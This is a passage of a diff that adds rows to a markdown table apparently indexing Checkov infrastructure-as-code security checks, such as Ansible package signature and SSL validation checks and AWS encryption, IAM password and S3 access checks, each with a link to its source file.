validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 87 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 88 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 89 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 90 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 91 | CKV_ANSIBLE_4 | resource | [?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 92 | CKV_ANSIBLE_4 | resource | [?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 93 | CKV_ANSIBLE_4 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | 
[YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 94 | CKV_ANSIBLE_4 | resource | [].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 95 | CKV_ANSIBLE_4 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 96 | CKV_ANSIBLE_4 | resource | [].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 97 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 98 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 99 | CKV_ANSIBLE_4 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 100 | CKV_ANSIBLE_4 | resource | [].tasks[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 101 | CKV_ANSIBLE_4 | 
resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 102 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 103 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 104 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 105 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 106 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | +| 107 | CKV_ANSIBLE_5 | resource | [?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 108 | CKV_ANSIBLE_5 | resource | [?"apt" != null][] | Ensure that 
packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 109 | CKV_ANSIBLE_5 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 110 | CKV_ANSIBLE_5 | resource | [].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 111 | CKV_ANSIBLE_5 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 112 | CKV_ANSIBLE_5 | resource | [].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 113 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 114 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | 
[AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 115 | CKV_ANSIBLE_5 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 116 | CKV_ANSIBLE_5 | resource | [].tasks[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 117 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 118 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 119 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 120 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | 
+| 121 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 122 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | +| 123 | CKV_ANSIBLE_6 | resource | [?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 124 | CKV_ANSIBLE_6 | resource | [?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 125 | CKV_ANSIBLE_6 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 126 | CKV_ANSIBLE_6 | resource | [].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a 
broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 127 | CKV_ANSIBLE_6 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 128 | CKV_ANSIBLE_6 | resource | [].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 129 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 130 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 131 | CKV_ANSIBLE_6 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | 
[AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 132 | CKV_ANSIBLE_6 | resource | [].tasks[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 133 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 134 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 135 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 136 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | 
[AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 137 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 138 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | +| 139 | CKV2_ANSIBLE_1 | resource | tasks.ansible.builtin.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | +| 140 | CKV2_ANSIBLE_1 | resource | tasks.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | +| 141 | CKV2_ANSIBLE_2 | resource | tasks.ansible.builtin.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | +| 142 | CKV2_ANSIBLE_2 | resource | tasks.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | +| 143 | CKV2_ANSIBLE_3 | resource | block | Ensure block is handling task errors properly | Ansible | 
[BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml) | +| 144 | CKV2_ANSIBLE_4 | resource | tasks.ansible.builtin.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | +| 145 | CKV2_ANSIBLE_4 | resource | tasks.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | +| 146 | CKV2_ANSIBLE_5 | resource | tasks.ansible.builtin.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | +| 147 | CKV2_ANSIBLE_5 | resource | tasks.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | +| 148 | CKV2_ANSIBLE_6 | resource | tasks.ansible.builtin.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | +| 149 | CKV2_ANSIBLE_6 | resource | tasks.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | +| 150 | CKV_ARGO_1 | argo_workflows | spec | Ensure Workflow pods are not using the default ServiceAccount | Argo Workflows | 
[DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py) | +| 151 | CKV_ARGO_2 | argo_workflows | spec | Ensure Workflow pods are running as non-root user | Argo Workflows | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py) | +| 152 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | +| 153 | CKV_AWS_1 | resource | serverless_aws | Ensure IAM policies that allow full "*-*" administrative privileges are not created | serverless | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py) | +| 154 | CKV_AWS_2 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure ALB protocol is HTTPS | Cloudformation | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py) | +| 155 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 156 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | +| 157 | CKV_AWS_3 | resource | AWS::EC2::Volume | Ensure all data stored in the EBS is securely encrypted | Cloudformation | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py) | +| 158 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data 
stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | +| 159 | CKV_AWS_5 | resource | AWS::Elasticsearch::Domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Cloudformation | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py) | +| 160 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 161 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 162 | CKV_AWS_6 | resource | AWS::Elasticsearch::Domain | Ensure all Elasticsearch has node-to-node encryption enabled | Cloudformation | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 163 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 164 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 165 | 
CKV_AWS_7 | resource | AWS::KMS::Key | Ensure rotation for customer created CMKs is enabled | Cloudformation | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py) | +| 166 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | +| 167 | CKV_AWS_8 | resource | AWS::AutoScaling::LaunchConfiguration | Ensure all data stored in the Launch configuration EBS is securely encrypted | Cloudformation | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 168 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 169 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 170 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | +| 171 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | 
[PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | +| 172 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | +| 173 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | +| 174 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | +| 175 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | +| 176 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | +| 177 | CKV_AWS_16 | resource | AWS::RDS::DBInstance | Ensure all data stored in the RDS is securely encrypted at rest | Cloudformation | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py) | +| 178 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | 
[RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | +| 179 | CKV_AWS_17 | resource | AWS::RDS::DBInstance | Ensure all data stored in RDS is not publicly accessible | Cloudformation | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py) | +| 180 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 181 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 182 | CKV_AWS_18 | resource | AWS::S3::Bucket | Ensure the S3 bucket has access logging enabled | Cloudformation | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py) | +| 183 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | +| 184 | CKV_AWS_19 | resource | AWS::S3::Bucket | Ensure the S3 bucket has server-side-encryption enabled | Cloudformation | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py) | +| 185 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 186 | CKV_AWS_19 | 
resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 187 | CKV_AWS_20 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow READ permissions to everyone | Cloudformation | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py) | +| 188 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 189 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | +| 190 | CKV_AWS_21 | resource | AWS::S3::Bucket | Ensure the S3 bucket has versioning enabled | Cloudformation | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py) | +| 191 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 192 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | +| 193 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is 
encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) |
